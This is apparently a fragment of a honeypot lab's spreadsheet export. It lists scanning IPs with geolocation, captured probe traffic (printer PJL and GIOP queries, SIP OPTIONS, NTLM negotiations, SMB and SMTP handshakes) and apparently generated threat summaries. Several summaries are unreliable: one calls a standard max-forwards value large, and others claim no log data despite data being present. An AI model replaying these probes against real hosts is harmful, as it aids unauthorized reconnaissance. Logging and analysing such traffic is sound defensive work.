    <t>NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.117.64:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.255.123.181:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=55385'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '91.194.11.82:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '91.194.11.82:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=14902'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 66.94.127.183:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,12190)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (YVyUUxSp,)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.8.69:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.181.21.224:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=33297'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,56374)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (BeZFksGy,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.42.176:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.79.122:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=2428'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=12120'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.42.176:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.8.69:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.216,53026)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (fewlrZrw,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.216;rport=41342'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dd8</t>
  </si>
  <si>
    <t>A malicious user is making a reconnaissance call to identify available services on the network, likely attempting to exploit vulnerabilities in SIP-based systems for further attacks or eavesdropping. The OPTIONS request with a large max-forwards value suggests an attempt to probe the network's maximum hop count, potentially enabling a reflection attack. This behavior is characteristic of port scanning and reconnaissance tactics used by malicious actors. &amp;&amp; An unknown client initiated an OPTIONS request to a networked system, potentially probing for vulnerabilities or services available on the target system. The request was likely sent from an external IP address and may be part of a reconnaissance scan. This activity could indicate malicious intent. &amp;&amp; There is insufficient information to analyze any potential malicious activity. &amp;&amp; Malicious activity detected: A request was made to a server with an unknown client IP address, attempting to access the root directory over HTTPS. The client is not specifying any specific service or resource. &amp;&amp; Unknown host is attempting a GET request to the root directory of a server, potentially trying to scan for vulnerabilities. The '*' in the Accept header suggests it may be a scanner or spider. This behavior could be indicative of reconnaissance activity.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Scanning Attack &amp;&amp; HTTP Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>c74ee8dca8ebc66b23818a009eac8489</t>
  </si>
  <si>
    <t>200.89.174.243</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;5419&amp;&amp;NA</t>
  </si>
  <si>
    <t>Buenos Aires F.D.</t>
  </si>
  <si>
    <t>Comuna 14</t>
  </si>
  <si>
    <t>Buenos Aires (Palermo)</t>
  </si>
  <si>
    <t>3435910</t>
  </si>
  <si>
    <t>-34.5752</t>
  </si>
  <si>
    <t>-58.4359</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,52775)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,52852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60488)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60657)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60652)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,62013)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61483)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61877)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,56550)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,56751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,65064)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,49468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,64667)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,64784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,53597)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,53971)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,60748)}&amp;&amp;{Data_SMB:Incoming connection (200.89.174.243,61444)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:c859:aef3</t>
  </si>
  <si>
    <t>The log indicates a potential attempt to access Microsoft SQL database management system, likely through brute force or unauthorized means. This could be part of a larger attack aimed at gaining sensitive information or disrupting database operations. The lack of successful login details suggests an attempted breach rather than a successful compromise.</t>
  </si>
  <si>
    <t>37fa87d4fe04e40116d52721cb9c2b4f</t>
  </si>
  <si>
    <t>45.236.162.155</t>
  </si>
  <si>
    <t>NA&amp;&amp;45-236-162-155.digitusinfo.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H31</t>
  </si>
  <si>
    <t>MG</t>
  </si>
  <si>
    <t>Minas Gerais</t>
  </si>
  <si>
    <t>Icaraí de Minas</t>
  </si>
  <si>
    <t>3480766</t>
  </si>
  <si>
    <t>-16.2182</t>
  </si>
  <si>
    <t>-44.9027</t>
  </si>
  <si>
    <t>268241</t>
  </si>
  <si>
    <t>DIGITUS INFORMATICA LTDA - ME</t>
  </si>
  <si>
    <t>Digitus Informatica Ltda - ME</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,53838)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,53904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,55401)}&amp;&amp;{Data_SMB:Incoming connection (45.236.162.155,55764)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:2dec:a29b</t>
  </si>
  <si>
    <t>The attacker is likely conducting a reconnaissance and scanning activity across various ports and services, attempting to identify vulnerabilities and potential entry points into the system. They are sending probes and queries to determine what services are running and how they can be exploited.</t>
  </si>
  <si>
    <t>3aa2d09705ee55f9ff0c01719a3523a8</t>
  </si>
  <si>
    <t>61.58.70.100</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4</t>
  </si>
  <si>
    <t>23&amp;&amp;41629&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hsinchu City</t>
  </si>
  <si>
    <t>Hsinchu</t>
  </si>
  <si>
    <t>1675151</t>
  </si>
  <si>
    <t>24.8138</t>
  </si>
  <si>
    <t>120.967</t>
  </si>
  <si>
    <t>131596</t>
  </si>
  <si>
    <t>TBC</t>
  </si>
  <si>
    <t>TBCOM</t>
  </si>
  <si>
    <t>Taiwan Broadband Communications, Co.</t>
  </si>
  <si>
    <t>::ffff:3d3a:4664</t>
  </si>
  <si>
    <t>00210258a46353faebbfa084c8d81fe2</t>
  </si>
  <si>
    <t>103.160.207.187</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>23&amp;&amp;1054&amp;&amp;26320&amp;&amp;NA</t>
  </si>
  <si>
    <t>Amroha</t>
  </si>
  <si>
    <t>Morādābād (Majhola)</t>
  </si>
  <si>
    <t>1262801</t>
  </si>
  <si>
    <t>244001</t>
  </si>
  <si>
    <t>28.83</t>
  </si>
  <si>
    <t>78.7419</t>
  </si>
  <si>
    <t>135182</t>
  </si>
  <si>
    <t>MORADABAD INTERNET SERVICES PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Moradabad Internet Services Private Limited</t>
  </si>
  <si>
    <t>Speed Infotech Solutions</t>
  </si>
  <si>
    <t>::ffff:67a0:cfbb</t>
  </si>
  <si>
    <t>5c0b823e1041ba368726a01f82eb2342</t>
  </si>
  <si>
    <t>154.212.141.207</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_MYSQL_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;110&amp;&amp;80&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;5432&amp;&amp;389&amp;&amp;43528&amp;&amp;9100&amp;&amp;443&amp;&amp;445&amp;&amp;3389&amp;&amp;25</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;GET&amp;&amp;query&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=49453'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=58357'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=39708'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=53022'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=50872'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=56396'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=58385'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '103.113.68.70:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '103.113.68.70:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '103.113.68.70:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=47846'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.207,57212)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (ayDZKsaP,)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.26.156.60:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=47982'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 209.145.61.177:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.207,57684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (wwdYTlMT,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.182.38.84:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 45.14.244.111:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.118.77:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.250.150.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dcf</t>
  </si>
  <si>
    <t>No malicious activity detected as log data is missing.</t>
  </si>
  <si>
    <t>I need some log data to analyze! Please provide it, and I'll be happy to identify the types of attacks. &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>c6b57fb458cc5ab6a1b92d9f20c3a5c5</t>
  </si>
  <si>
    <t>104.167.222.199</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>Jackson</t>
  </si>
  <si>
    <t>Kansas City (Paseo West)</t>
  </si>
  <si>
    <t>4393217</t>
  </si>
  <si>
    <t>64106</t>
  </si>
  <si>
    <t>39.1049</t>
  </si>
  <si>
    <t>-94.568</t>
  </si>
  <si>
    <t>399045</t>
  </si>
  <si>
    <t>DediOutlet, LLC</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}</t>
  </si>
  <si>
    <t>::ffff:68a7:dec7</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze or comment on malicious activity. &amp;&amp; No available log data provided for analysis. &amp;&amp; The SMTP service is being scanned, possibly indicating a reconnaissance activity to identify potential vulnerabilities or determine if the system is available for further exploitation. This is often an initial step by attackers before launching more sophisticated attacks. It could also be part of a larger scanning operation targeting multiple systems and services. &amp;&amp; An attacker is attempting to initiate a secure connection for SMTP protocol. This could be an initial step for email-based attacks such as phishing or spamming. The attacker may be trying to establish a persistent connection.</t>
  </si>
  <si>
    <t>SMTP Exploit</t>
  </si>
  <si>
